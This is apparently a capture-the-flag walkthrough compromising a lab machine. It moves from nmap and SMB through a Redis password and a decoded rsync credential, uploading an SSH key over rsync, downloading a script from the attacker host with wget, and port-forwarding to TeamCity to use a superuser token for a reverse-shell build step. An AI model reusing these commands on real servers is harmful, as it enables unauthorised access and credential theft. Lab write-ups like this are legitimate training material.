nmap
1 | nmap -p- -T5 -sV -vvv 10.10.210.193 |
Output:
1 | PORT STATE SERVICE REASON VERSION |
SMB
1 | //smbclient //10.10.210.193/shares -U "guest" |


NFS
1 | sudo pacman -S nfs-utils |

The config files are interesting, we have the service redis.
Let’s grab the password.
B65Hx562F@ggAZ@F
Redis
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
1 | nc -vn 10.10.210.193 6379 |

Get “authlist”:
1 | LRANGE "authlist" 0 -1 |

Decode the hash:
1 | echo QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== |base64 -d |
Output:
1 | Authorization for rsync://[email protected] with password Hcg3HP67@TW@Bc72v |
Rsync
List the files:rsync -av --list-only rsync://10.10.210.193
Copy files.rsync -av rsync://[email protected]/files ./files

We have the flag, tree don’t list the uden flags.
https://medium.com/r3d-buck3t/attack-insecure-rsync-service-928951af34ed
There is a .ssh, we can upload a authorized_keys to conncet via ssh.
1 | ssh-keygen -t rsa |

Then upload it:
1
rsync authorized_keys rsync://[email protected]/files/sys-internal/.ssh
Connect to ssh:
1 | ssh -i A_rsa [email protected] |
SSH
lse.sh

Then:
1 | wget http://10.8.50.167:8000/lse.sh |

yeah but I don’t have my password
8111
Port forwarding
https://hideandsec.sh/books/cheatsheets-82c/page/pivoting
1 | ss |
The port 8111 is open:
1 | ssh -i A_rsa [email protected] -D 8111:127.0.0.1:8111 -N |
http://127.0.0.1:8111/login.html
Click on “as a Super user” then:
1 | cd /TeamCity/logs |
Output:
1 | ./catalina.out:56:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server) |

once the command is in the build step, start the listener then click on run.